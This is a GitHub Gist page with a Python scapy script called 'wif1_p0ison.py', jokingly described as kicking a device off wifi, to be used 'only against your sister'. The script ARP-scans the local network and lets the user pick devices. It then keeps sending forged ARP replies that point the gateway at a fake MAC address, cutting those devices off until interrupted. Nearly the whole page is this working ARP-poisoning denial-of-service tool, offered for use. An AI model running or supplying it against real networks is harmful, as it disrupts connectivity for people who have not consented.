Last active
March 15, 2020 02:12
-
-
Save andreafioraldi/9f8a9e23a363c069b3dd61e56897f4c0 to your computer and use it in GitHub Desktop.
Kick off a device from wifi --- Use it only against your sister
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import time | |
import os | |
import requests | |
from scapy.all import * | |
DEFAULT_BAD_GATEWAY = '12:34:56:78:9A:BC' | |
class Device(object): | |
def __init__(self, ip, mac, vendor): | |
self.ip = ip | |
self.mac = mac | |
self.vendor = vendor | |
def __str__(self): | |
return "%s %s %s" % (self.ip, self.mac, self.vendor) | |
def scan_lan(): | |
# get lan ip (works only with internet connection) | |
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) | |
s.connect(("google.com", 80)) | |
lan_ip = s.getsockname()[0] | |
s.close() | |
# lan ip range (like 192.168.1.*) | |
lan_range = lan_ip[:lan_ip.rfind(".") +1] + "*" | |
# get gateway ip (assumed .1) | |
gateway_ip = lan_ip[:lan_ip.rfind(".") +1] + "1" | |
gateway_mac = None | |
answers, _ = arping(lan_range, verbose=0) | |
scan_result = [] | |
for answer in answers: | |
mac = answer[1].hwsrc | |
ip = answer[1].psrc | |
if ip == gateway_ip: | |
gateway_mac = mac | |
try: | |
r = requests.get('http://macvendors.co/api/%s' % mac) | |
vendor = str(r.json()["result"]["company"]) | |
except: | |
vendor = "<vendor not found>" | |
scan_result += [Device(ip, mac, vendor)] | |
return gateway_ip, gateway_mac, scan_result | |
def poison(device, gateway_ip): | |
# an ARP packet to associate the gateway ip with a wrong mac address | |
packet = ARP(op=2, psrc=gateway_ip, hwsrc=DEFAULT_BAD_GATEWAY, pdst=device.ip, hwdst=device.mac) | |
send(packet, verbose=0) | |
def restore(device, gateway_ip, gateway_mac): | |
# an ARP packet to associate the gateway ip with teh correct mac address | |
packet = ARP(op=2, psrc=gateway_ip, hwsrc=gateway_mac, pdst=device.ip, hwdst=device.mac) | |
send(packet, verbose=0) | |
def banner(): | |
print " ]===== wif1_p0ison.py =====[" | |
print " ]====== by malweisse ======[" | |
print " [ commands ]" | |
print " scan :: scan the lan for devices" | |
print " devices :: print prevous scanned devices" | |
print " add <idx> :: add devices[idx] to the to-block list" | |
print " add all :: add all scanned devices to the to-block list" | |
print " remove <idx> :: remove to-block[idx] from the to-block list" | |
print " remove all :: clean the to-block list" | |
print " list :: print the to-block list" | |
#print " restore <idx> :: reset device[idx] with correct gateway" | |
print " run :: poison all devices in the to-block list" | |
print " quit :: quit shell" | |
def shell(): | |
gateway_ip = None | |
gateway_mac = None | |
devices = [] | |
block_list = [] | |
while True: | |
cmd = raw_input(":> ") | |
cmd = cmd.split() | |
if len(cmd) == 0: | |
continue | |
if cmd[0] == "scan": | |
print " >> scanning lan..." | |
gateway_ip, gateway_mac, devices = scan_lan() | |
for i in xrange(len(devices)): | |
print " (id: %d) " % i, devices[i] | |
print " >> scan completed" | |
if gateway_mac == None: | |
print " >> WARNING! gateway not found so i can't restore normal wifi behaviour after poisoning!" | |
print " >> quit if you don't know what are you doing." | |
elif cmd[0] == "devices": | |
print " >> scanned devices" | |
for i in xrange(len(devices)): | |
print " (id: %d) " % i, devices[i] | |
elif cmd[0] == "add": | |
if len(cmd) == 1: | |
print " >> invalid idx" | |
continue | |
if cmd[1] == "all": | |
for i in xrange(len(devices)): | |
block_list.append(devices[dev_id]) | |
continue | |
try: | |
dev_id = int(cmd[1]) | |
except: | |
print " >> invalid idx" | |
continue | |
if dev_id < 0 or dev_id >= len(devices): | |
print " >> invalid idx" | |
continue | |
block_list.append(devices[dev_id]) | |
elif cmd[0] == "remove": | |
if len(cmd) == 1: | |
print " >> invalid idx" | |
continue | |
if cmd[1] == "all": | |
block_list = [] | |
continue | |
try: | |
dev_id = int(cmd[1]) | |
except: | |
print " >> invalid idx" | |
continue | |
if dev_id < 0 or dev_id >= len(block_list): | |
print " >> invalid idx" | |
continue | |
block_list.pop(dev_id) | |
elif cmd[0] == "list": | |
print " >> to-block list" | |
for i in xrange(len(block_list)): | |
print " (id: %d) " % i, block_list[i] | |
elif cmd[0] == "run": | |
print " >> poisoning..." | |
print " >> press CTRL+C to stop" | |
while True: | |
try: | |
for victim in block_list: | |
poison(victim, gateway_ip) | |
except KeyboardInterrupt: | |
if gateway_mac == None: | |
print " >> unable to restore without the gateway mac" | |
else: | |
print " >> restoring..." | |
for victim in block_list: | |
restore(victim, gateway_ip, gateway_mac) | |
print ' >> done' | |
break | |
elif cmd[0] == "quit": | |
exit(0) | |
else: | |
print " >> invalid command" | |
def main(): | |
if os.geteuid() != 0: | |
print " >> please use the root user" | |
exit(1) | |
banner() | |
shell() | |
if __name__ == "__main__": | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment